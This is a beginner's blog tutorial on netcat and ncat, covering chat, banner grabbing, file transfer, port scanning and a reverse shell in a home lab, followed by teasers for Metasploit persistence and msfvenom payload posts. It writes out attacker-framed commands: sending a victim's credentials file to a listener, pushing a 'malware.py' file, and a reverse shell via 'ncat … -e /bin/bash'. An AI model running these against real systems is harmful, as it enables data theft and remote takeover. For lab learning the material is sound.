Netcat Tool

-

                            Netcat Tool:

Netcat tool is also know as the Swiss army knife it is used to for file-sharing , to make reverse shells , banner grabbing, scanning and we could use it to chat as well !! Interesting right , netcat , nc and Ncat all the tools do the same thing , but the thing that makes Ncat special is that it encrypts the traffic , but unlike netcat and nc it doesn't come pre-installed , now let’s stop hitting around the bush and make our hands dirty .
Firstly let’s see some of the popularly used options in netcat:

Fig:1.0


1)  -l option: this means to listen and this is used to open a port on our system and wait for other computers to connect

2)-v option: this means verbose mode , sometimes what happens is that  when we try to connect to other system , there might be some cases where the request is timed-out or refused and those thing aren't displayed to us , so it is always recommended to use -v which verbose mode

3)-p option: this option is used to specify the port we wanted to scan  

4) -w option : If you are trying to connect to a network , there might be possibility of firewall over there defending or dropping our packets which we don't know and we will be sending the packets continuously then our time is wasted , so in that case we would set the timeout , let's say that we are sending packets to a particular port and we could set the timeout to 5 sec , which means , wait for 5 seconds for the response and if you didn't get any response then move to the other one or quit if there isn’t any.

5)-n option : when we mention the ip address instead of the hostname there is no need for the tool to do dns resolution , so this options tells not to resolve and connect directly

6)-e option : we could execute commands using netcat with the help of option which is very powerful and dangerous and gold for us as hackers 

7)-z option : This option is used to perform the port scan 

Don’t worry if this doesn’t make sense , this is just an overview and now let’s me go through all the option one by one in practical

TCP Chat with netcat : 

netcat is capable of creating a simple TCP or UDP connection between two computers and then open a communication channel between them. Let’s open a listener on the remote system first i.e. on Windows 10 machine.

Command: 

ncat-lvp 99

Here - l means listen and –p specifies the port on which the machine to listen , so we could say that we are waiting for connections  on port 99 
And on the other host (Linux) we should connect to the port that our windows machine is listening to : 

Command:

ncat -v 192.168.0.116 99

Here we mentioned the ip and port  we wanted to connect to and –v is to give more info about the connection 

Without the option –v in both the commands you will not get the message of version and the listening revert, and also the connection from ip adderss status on the server side (windows machine) and connection to status (Linux machine) after the connection is made

And now as the connection is made you can communicate  as you can see in Fig:1.1.  And you can press Ctrl+c after you are done with the fun Fig:1.1

Fig:1.1


Banner Grabbing :

What is meaning of banner grabbing ?
Banner grabbing is the act of capturing the information provided by banners, configurable text-based welcome screens from network hosts that generally display system information. Banners are intended for network administration.

We have to connect to a webserver it might be local or over the internet and send the http request to get the response so that we could analyse the header and get the information about the type of software and the version the webserver is using and we could inspect many more. 
Command : 

ncat  -n 142.250.206.142 80

Here ip address belong to the host www.google.com and -n option specifies that there is no need to do domain Resolution to get the ip address coz we have given the raw ip address itself and now to generate the request by typing : HEAD / HTTP/1.1 and Host:www.google.com

Now press enter few times and you will receive the response of the headers and you could get the information of the webserver as software and version is being used  Fig:1.2

Fig:1.2



Sharing Files :

Before going to the real thing first let’s talk about the redirection topic which plays a crucial role in sharing files through netcat .

Echo command:

echo "haha" , this returns an output haha and the output will be displayed onto the screen

echo "haha" > file.txt , this means : as always echo returns the output haha but the output is redirected to the file file.txt

Cat command:

cat file.txt : here the cat command will go and read the file and then the cat command will display the content of the file

cat < file.txt : here this is similar to the previous command cat file.txt but here the content of the file will not be read by the cat command directly instead a shell is opened and that shell will read the content of the file and then it is sent to the cat as an input

Now I can assume we are all clear about this let’s move on …

Storing message into a file using netcat tool :

Here In the Linux machine we have been listening on port 99 and we are redirecting the received data into file called credentials.txt and now I have connected to Linux machine through my windows machine And as you can see I have sent username and password to the Linux machine and It did not display on the screen over the Linux machine instead it redirected it into file named credentials.txt , and then after terminating the connection , I have displayed the content of the file onto the terminal screen using the cat command.  Fig:1.3

Fig:1.3


Downloading files from remote host : 

Point of view : you are an attacker who is a listener and receiver , the command  here on the attacker side or the listener side :          

Command: 

ncat –lvp 99 > remotefile.txt

This command says whatever data you get save that into the file remotefile.txt or we could say that we are redirecting the data that we get from the victim to the file named remotefile.txt instead of displaying it onto the screen and On the victim side the command :                                                                        

ncat 192.168.32.32 < credentials.txt

 you are reading the data that is inside the file (not directly, as you have discussed   before) and then sending on to the other side  and you could see here I have used cmd instead of powershell coz it will not support redirection and this is how you can get the file from the remote server or system as an attacker using netcat  Fig:1.4

Fig:1.4



Uploading files onto remote machine using netcat : 

Point of view : here we are the attacker who wanted to send a malicious file onto the remote host by using the command (on the sender or the listener side): 

Command:
                                 
ncat –lvp 99 < malware.py (the content of the file is : print(“Malware Executed !!”)) 

Now unlike receiving the data we wanted to send the data to those who have connected to our system , so the redirection symbol is lesser than now. And on the receiver side  \

Command:                                                                           

ncat 192.168.32.32 > safefile.py

 we need to save the data into the file so the redirection symbol is greater than. And remember that we don’t send the file or the copy of the file , we send the data of the file , if we don’t use the remove the > safefile.py on the connector side or the receiver side then the data of the file is printed onto the screen of the terminal .  Fig:1.5

Fig:1.5


Reverse shell with netcat : 

Here let us consider our Linux machine as the victim and our windows machine as the attacker machine , we are listening on port 99 on our windows machine  

Command :                                                               

ncat –lvp 99

and we made a connection from our Linux machine to our windows machine by giving it our shell with 

Command :                               

ncat 192.168.0.115 (windows ip) 99 –e /bin/bash

and this is called as reverse shell , here the -e option means to execute commands , you can also see I am able to execute Linux commands on windows machine . Fig:1.7

Fig:1.7


This is also the other way we could make connections you could try it yourself , here we are listening on our Linux machine and who ever connects to us we are giving shell to them !!    Fig:1.8

Fig:1.8



Port scanning with netcat :

Here we have started Apache server on Linux machine which is running on port 80 and on the Linux machine we have scanned the port 80 on the Linux machine using the 

Command:

ncat –zvw 2 192.168.0.105 80

In the command –z option tells that we are about to scan the port of a host and the –w sets the timeout time and it is set to 2 secs , so if the remote host didn’t reply to us , we wait for 2 seconds and then the netcat command will disconnect displaying TIMEOUT on the terminal screen.  Fig:1.9

Fig:1.9



                           Thank You


Comments

Post a Comment

Popular posts from this blog

Persistence Techniques with Metasploit - Part 6

-
Image
     Persistence Techniques with Metasploit Getting a shell in real world requries a lot of hardwork and research , All this work put in so that we will be ok to loose the session when the user logs off or turns the computer off ? Hell no ! , we need to make our connection persistance so that we can get back alive when the computer's on or when the user logs in. And we will be taking a look into the post module section which helps us to make our connection persistence after exploiting the target machine. Note : For creating a persistence backdoor you should have already compromised the target machine and have the meterpreter shell  Pov : you have already exploited the target machine and had a meterpreter shell Commands :  use exploit/windows/local/persistence_exe show options Fig : 1.1 In Fig : 1.1 we can see the different options availabe REXENAME option defines the name of the exe file the module is going to put on the remote system REXEPATH denotes the local ...
Read more

Learning Nmap Host Discovery with iptables and Wireshark Analysis

-
Image
Learning Nmap Host Discovery with Iptables  and Wireshark Analysis Finally the wait is no longer , we are going to learn host discovery using nmap in a very detailed way. Well you might say that there are many videos and blogs out there what is special about this one ? , In this blog I will be sharing my knowledge after going through several videos , nmap book and many other blogs in the most detailed way possible , well you will see the difference after going through the blog . When I say I really mean it . Heads up !! you must know basis of iptables before going through the blog  and you might ask why ? coz we not just learning just by saying that nmap blocks the packets so this host discovery isn't going to work.  we are going to block the packets and run the discovery again and bypass the our rules ourselves that how this blog is designed very thing is practical practical and practical . How cool is that ?!. well I wrote blog on iptables just for you !! click here an...
Read more

Generating Payloads using Msfvenom - Metasploit Part 5

-
Image
Generating and encoding Payloads using  Msfvenom Well aparantely msfvenom is a seperate tool from msfconsole which is used to generate payloads but it doesn't mean that we cannot create payloads using msfconsole but the advantage of using msfvenom is that there is no need for us to be in the msfconsole to generate payloads but no worries we will be covering both the methods :) So let's hop onto it shall we ! Command : msfvenom --list Fig : 1.1 In Fig : 1.1 we can see using the command we can list a brief instructions on how to use different options with it To list different types of modules we can use Command : msfvenom --list [modules] eg:payloads Fig : 1.2 In Fig : 1.2 we can see the different types of available payloads we can use with msfvenom and obviously it is going to take a while when you execute the command to load loads of payloads Let's create a meterpreter staged payload Command : msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=port_number -...
Read more